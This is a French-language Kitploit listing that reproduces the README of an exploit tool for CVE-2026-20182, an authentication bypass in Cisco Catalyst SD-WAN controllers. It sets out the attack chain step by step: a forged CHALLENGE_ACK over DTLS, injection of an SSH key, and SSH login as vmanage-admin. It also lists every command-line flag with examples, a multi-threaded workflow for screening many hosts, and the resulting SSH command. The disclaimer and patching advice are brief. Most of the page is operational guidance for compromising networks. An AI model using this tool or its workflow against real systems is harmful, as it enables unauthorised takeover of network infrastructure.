Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20182 — Contournement d'authentification du peering Cisco Catalyst SD-WAN | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-20182
Authentification et AutorisationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'IntrusionRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Contournement d'authentification du peering Cisco Catalyst SD-WAN

Voir le dépôt
123il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20182

Contournement de l'authentification de peering Cisco Catalyst SD-WAN

CVE-2026-20182 — Contournement de l'authentification de peering Cisco Catalyst SD-WAN

Outil d'évaluation pour les tests autorisés du contournement de l'authentification de peering du contrôleur/gestionnaire Cisco Catalyst SD-WAN (CVE-2026-20182).

CVECVE-2026-20182
GravitéCritique (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProduitContrôleur Cisco Catalyst SD-WAN (anciennement vSmart) · Gestionnaire Cisco Catalyst SD-WAN (anciennement vManage)
ProblèmeMécanisme d'authentification de peering non appliqué correctement
ScriptCVE-2026-20182.py

Résumé de la vulnérabilité

Avis de mai 2026 : une faille dans la poignée de main de connexion de contrôle / l'authentification de peering permet à un attaquant distant non authentifié de contourner l'authentification et d'obtenir un accès interne à privilèges élevés sur les systèmes affectés.

Un attaquant envoie des requêtes falsifiées au système affecté. En cas de succès, l'attaquant peut s'authentifier en tant que compte interne, à privilèges élevés, non root et atteindre NETCONF, permettant la manipulation de la configuration du tissu SD-WAN.

Recommandation : Appliquer les correctifs de sécurité Cisco conformément aux directives officielles du fournisseur. Limiter l'exposition du plan de gestion, surveiller les connexions du plan de contrôle et auditer les contrôleurs SD-WAN pour détecter les modifications de configuration non autorisées.


Contact

Telegram : @KNxploited


Aperçu de la console

Console d'opérations CVE-2026-20182


Outil : CVE-2026-20182.py

Framework d'exploitation Python 3 pour CVE-2026-20182 contre Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Ce qu'il fait (étape par étape)

Rétablissement du tissu : En cas de TEAR_DOWN ou de discordance de paramètres, réessaye avec les préréglages alternatifs domaine/site (1,100), (1,1), (0,0) sauf si --no-fallback.


Niveaux de résultats (lire attentivement)

Important

  • Mode check → niveau 03 au mieux (sonde de contournement). Pas une preuve d'exploitation complète.
  • Mode full → viser le niveau 01 (ssh_verified).
  • https://host dans la liste → indice web TCP uniquement (80/443). Pas UDP DTLS sur 443.

Prérequis

root@kitploit:~
pip install -r requirements.txt

OpenSSL (système)

Windows

  1. Installer Win64 OpenSSL 3.x ou équivalent
  2. Ajouter bin\ au PATH, ou définir :
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

L'outil se ferme au démarrage si OpenSSL ne peut pas être chargé.


Démarrage rapide

Menu interactif (par défaut)

root@kitploit:~
python CVE-2026-20182.py
  • Configurer les options 1–11, puis 0 = LANCER L'ANALYSE
  • Mode d'exécution par défaut : check (sonde de contournement sûre)

Non interactif (automatisation)

root@kitploit:~
python CVE-2026-20182.py -y

Modes d'exécution

CHECK — sonde de contournement uniquement

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — injection de clé + vérification SSH (cibles autorisées uniquement)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

Référence CLI (chaque drapeau + exemple)

Cibles et workers

-f / --file — liste de cibles (défaut : targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — threads workers (1–200, défaut 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID par défaut quand absent de la liste (défaut : 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID par défaut quand absent de la liste (défaut : 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Mode et automatisation

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — ignorer le menu interactif ; utiliser uniquement les valeurs CLI

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Vérification SSH

--no-ssh-verify — ignorer le test SSH après injection (déconseillé en mode full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — essayer aussi TCP 22 après 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / tissu

--no-try-list-udp — uniquement UDP 12346 ; ignorer :port de la liste

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — lab : ports UDP supplémentaires sur chaque hôte

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — désactiver les tentatives de domaine/site en cas de TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Journalisation

-v / --verbose — journaliser chaque message TX/RX du protocole

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

Menu interactif (lorsque -y est omis)


Format de targets.txt

Une cible par ligne. Les lignes commençant par # sont ignorées.

Exemple de fichier

root@kitploit:~
# Contrôleurs de laboratoire — autorisés uniquement
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

Non pris en charge : IPv6 (IPv4 / nom d'hôte uniquement).


Fichiers de sortie

Exemple de commande SSH (niveau 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

Flux de travail recommandés

1) Cribler plusieurs hôtes (rapide)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

Consulter cisco_sdwan_03_bypass_only.jsonl et les statistiques en direct Contournement uniquement.

2) Confirmer l'exploit sur les hôtes présélectionnés

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

Consulter cisco_sdwan_01_confirmed_ssh.jsonl — seul fichier avec ssh_verified: true.

3) Déboguer un hôte unique (verbeux)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

Télémétrie en direct (pendant l'analyse)


Notes opérationnelles

  • Le mode par défaut est check — n'écrit pas de clés et ne prouve pas SSH par lui-même.
  • Vrai succès = ssh_verified=true en mode full uniquement.
  • Tissu corrigé / incorrect → souvent TEAR_DOWN après CHALLENGE_ACK ; activer le rétablissement du tissu ou corriger domaine/site dans la liste.
  • Pare-feu doit autoriser UDP/12346 (et tout port UDP supplémentaire de la liste) depuis votre scanner vers le contrôleur.
  • Ne pas commiter sdwan_keys/ ou les résultats d'analyse dans des dépôts publics.

Avertissement légal

Ce logiciel est destiné uniquement à la recherche en sécurité autorisée, à l'évaluation défensive et à l'éducation.

Vous devez avoir une autorisation écrite explicite pour tester tout système que vous ne possédez pas ou n'exploitez pas. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur n'est pas responsable de toute mauvaise utilisation, des dommages ou des conséquences juridiques découlant de l'utilisation de cet outil.

Utilisez uniquement sur des systèmes et réseaux où vous êtes explicitement autorisé à effectuer des tests de sécurité.


Par : Nxploited ( Khaled Alenazi )

Télécharger l’outil
ÉlémentDétail
Vecteur d'attaqueRéseau
Privilèges requisAucun
Interaction utilisateurAucune
PortéeModifiée
ImpactConfidentialité, intégrité et disponibilité — Élevé
ÉtapePhaseDescription
1Chargement des ciblesAnalyser targets.txt, fusionner les doublons par (host, domain_id, site_id)
2Vérification préalable OpenSSLCharger les bibliothèques partagées OpenSSL 3.x/4.x pour DTLS personnalisé
3Connexion DTLSSe connecter au port UDP cible (toujours 12346 en premier, puis liste de ports optionnelle)
4CHALLENGERecevoir le CHALLENGE (0x08) du serveur
5CHALLENGE_ACKEnvoyer un CHALLENGE_ACK falsifié en tant que vHub (type 2) — contournement de l'authentification
6HelloCompléter l'échange Hello — confirme le chemin de contournement
7aMode CHECKS'arrêter ici — enregistrer contournement / Hello OK uniquement (pas de clés, pas de SSH)
7bMode FULLInjecter une clé publique SSH via VMANAGE_TO_PEER
8ACK d'injectionAttendre REGISTER_TO_VMANAGE (0x0D) comme accusé de réception protocolaire
9Vérification SSHTester la connexion en tant que vmanage-admin sur TCP 830 (NETCONF), optionnellement 22
10SortieTrier les résultats en fichiers de niveaux + liste de commandes lisibles
NiveauFichierSignification
01 — SSH confirmécisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — seul niveau traité comme preuve de compromission complète
02 — ACK d'injection uniquementcisco_sdwan_02_inject_ack_only.jsonlLe protocole a accepté l'injection de clé ; la connexion SSH a échoué
03 — Contournement uniquementcisco_sdwan_03_bypass_only.jsonlHello/contournement OK ; aucune injection confirmée
PrérequisRemarques
Python3.9+
pipcryptography, rich
OpenSSLBibliothèques partagées 3.x ou 4.x (libssl + libcrypto) — obligatoire
ModeDrapeauInjection SSHVérification SSHQuand l'utiliser
CHECK--mode check (défaut)NonNonCriblage de masse, détection de contournement
FULL--mode fullOuiOui (sauf --no-ssh-verify)Preuve de compromission
#Option
1Fichier de cibles
2Threads workers
3DOMAIN_ID par défaut
4SITE_ID par défaut
5Mode : check / full
6Réessai automatique du tissu en cas de TEAR_DOWN
7Journalisation verbeuse du protocole
8Vérification SSH après injection
9Vérifier aussi SSH :22
10Essayer les ports UDP explicites de la liste
11Ports UDP supplémentaires (lab)
12Afficher l'aide sur le format de la liste
0▶ LANCER L'ANALYSE
FormatExempleComportement
IP / nom d'hôte10.0.0.1UDP 12346 + domaine/site par défaut
IP + port UDP10.0.0.2:12346Essaie aussi le port UDP de la liste
IP + port + domaine + site10.0.0.3:12346:1:100Tuple complet du tissu
URL HTTPShttps://10.0.0.4Hôte + indice TCP 443 uniquement (pas UDP/443)
URL HTTPhttp://10.0.0.5Indice TCP 80 uniquement
URL UDPudp://10.0.0.6:12346UDP explicite
Séparé par tabulation/virgule10.0.0.7 12346 1 100Identique au format à quatre champs
Clé=valeur10.0.0.8;port=12346;domain=1;site=100Syntaxe KV par point-virgule
FichierContenu
cisco_sdwan_results.jsonlRésultat JSON brut par tentative
cisco_sdwan_success.txtLignes SSH confirmées (séparées par des tabulations)
cisco_sdwan_01_confirmed_ssh.jsonlNiveau 01 — SSH vérifié
cisco_sdwan_02_inject_ack_only.jsonlNiveau 02 — ACK d'injection, SSH échoué
cisco_sdwan_03_bypass_only.jsonlNiveau 03 — contournement / Hello uniquement
cisco_sdwan_commands.txtCommandes SSH lisibles
cisco_sdwan_findings.jsonRésumé de session + compteurs
sdwan_keys/Clés privées générées (mode full)
CompteurSignification
ProgressionCibles terminées / total
SSH vérifiéCompteur niveau 01
ACK d'injectionCompteur niveau 02
Contournement uniquementCompteur niveau 03
ÉchecErreurs / pas de contournement